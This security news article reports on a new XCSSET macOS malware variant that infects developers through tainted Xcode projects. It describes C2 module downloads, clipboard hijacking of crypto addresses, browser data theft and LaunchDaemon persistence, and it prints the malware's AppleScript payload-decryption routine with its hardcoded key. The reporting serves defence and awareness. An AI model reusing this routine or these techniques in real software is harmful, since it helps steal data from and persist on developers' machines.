The macOS threat landscape has witnessed a significant escalation with the discovery of a new variant of the XCSSET malware targeting app developers.
First observed in late September 2025, this variant builds upon earlier versions by introducing enhanced stealth techniques, expanded exfiltration capabilities, and robust persistence mechanisms.
Attackers continue to leverage infected Xcode projects—the cornerstone of macOS and iOS development—as the primary infection vector.
Developers who clone or download tainted project repositories inadvertently trigger a multi-stage infection chain that unfolds each time an Xcode build is initiated.
Microsoft analysts noted that this variant was identified during routine telemetry analysis of Xcode build processes, revealing that malicious scripts are injected into project files and executed via AppleScript and shell commands.
The campaign remains relatively targeted, affecting only a small number of high-value development environments thus far.
Nonetheless, the sophistication of its modules—including clipboard hijacking, browser data theft, and LaunchDaemon-based persistence—underscores a growing trend of supply-chain exploitation in software development.
Upon build execution, the malware follows a four-stage chain consistent with earlier variants, but now adds a fourth stage that dynamically downloads and runs new submodules from a command-and-control (C2) server.
These submodules are fetched and executed using a modified boot function that includes additional checks for Firefox installations and Telegram binaries, enabling broader browser targeting and messaging-app reconnaissance.
Its expanded info-stealer module even exfiltrates data from Firefox profiles, complementing prior Chrome and Safari theft capabilities.
%20function%20of%20the%20latest%20version%20(Source%20-%20Microsoft).webp)
In this iteration, encrypted payloads and compiled run-only AppleScripts are employed to obfuscate functionality and evade static analysis.
The decryption routine (dec) is implemented in AppleScript and uses a hardcoded AES key and initialization vector extracted from the first 32 bytes of the encrypted blob.
After Base64 decoding, the script invokes the AES decryption primitive to retrieve a configuration file for further payload execution.
%20function%20(Source%20-%20Microsoft).webp)
on dec(in)
set iv to text 1 thru 32 of in
set encryptedData to (do shell script "echo "" & (text 33 thru -1 of in) & "" | base64 --decode")
set key to "27860c1670a8d2f3de7bbc74cd754121"
set decryptedBlob to do shell script "openssl aes-256-cbc -d -K " & key & " -iv " & iv & " <<< " & quoted form of encryptedData
return decryptedBlob
end decInfection Mechanism
The infection chain begins when a developer opens or builds a compromised Xcode project. A malicious Run Script Phase injects a shell command that downloads the fourth-stage AppleScript binary from C2.
This script first validates the environment by enumerating installed browsers and messaging apps, then fetches additional modules tailored for data theft and persistence.
Clipboard monitors intercept cryptocurrency addresses copied by users, substituting them with attacker-controlled addresses if predefined regex patterns match.
Meanwhile, the LaunchDaemon submodule writes a fake com.google.System Settings.app bundle into the tmp directory, loading a persistent .root payload at system launch.
By masquerading as a legitimate system component, XCSSET maintains execution across reboots and evades casual inspection.
This new XCSSET variant represents a leap forward in macOS supply-chain attacks against developers.
Its fusion of encrypted AppleScripts, dynamic module loading, and OS-level persistence poses a substantial threat to software integrity.
Developers are urged to verify the authenticity of Xcode project sources, monitor unexpected network requests during builds, and deploy endpoint protection solutions capable of detecting anomalous osascript executions and hidden LaunchDaemon entries.
Continuous vigilance and timely software updates remain the most effective defenses against evolving threats such as XCSSET.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
